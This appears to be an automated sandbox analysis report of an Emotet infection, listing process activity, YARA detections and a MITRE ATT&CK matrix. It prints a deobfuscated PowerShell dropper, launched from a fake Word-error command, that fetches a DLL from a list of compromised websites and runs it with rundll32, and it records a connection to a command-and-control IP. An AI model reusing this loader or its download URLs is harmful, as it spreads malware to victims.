                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_001F109C FindFirstFileW,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0025C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001DC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0028C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0023C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0070C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_0030C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0029C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_001FC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 5.2.136.90 80
                      Encrypted powershell cmdline option found
                      Source: unknown Process created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                      Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004C5A cpuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara match File source: 00000012.00000002.2114668618.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.2099273377.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000B.00000002.2105305860.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.2103683744.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000002.2113027910.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000002.2116945153.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000009.00000002.2101721678.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000002.2117172638.0000000000301000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.2103560548.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000009.00000002.2101746597.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000E.00000002.2109151387.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000012.00000002.2114707003.0000000000701000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2100654563.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000002.2110616410.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2112015647.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2106388395.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000014.00000002.2119170548.0000000000291000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000015.00000002.2351272233.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000E.00000002.2109044611.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2106314094.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2100698593.0000000000251000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000002.2110668347.0000000000281000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000015.00000002.2351339088.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000D.00000002.2107874642.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2112073559.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000D.00000002.2108018320.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.2099440995.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000002.2112967165.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000014.00000002.2119062368.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000B.00000002.2105231881.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 18.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 15.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 20.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 18.2.rundll32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 21.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 21.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 20.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 21.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 15.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 15.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 16.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.6e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 111 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 13 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 32 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 3 | LSASS Memory | File and Directory Discovery 3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Native API 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 32 | Security Account Manager | System Information Discovery 26 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Security Software Discovery 31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 23 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Command and Scripting Interpreter 211 | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | PowerShell 4 | Rc.common | Rc.common | Masquerading 21 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 111 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                      Behavior Graph

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
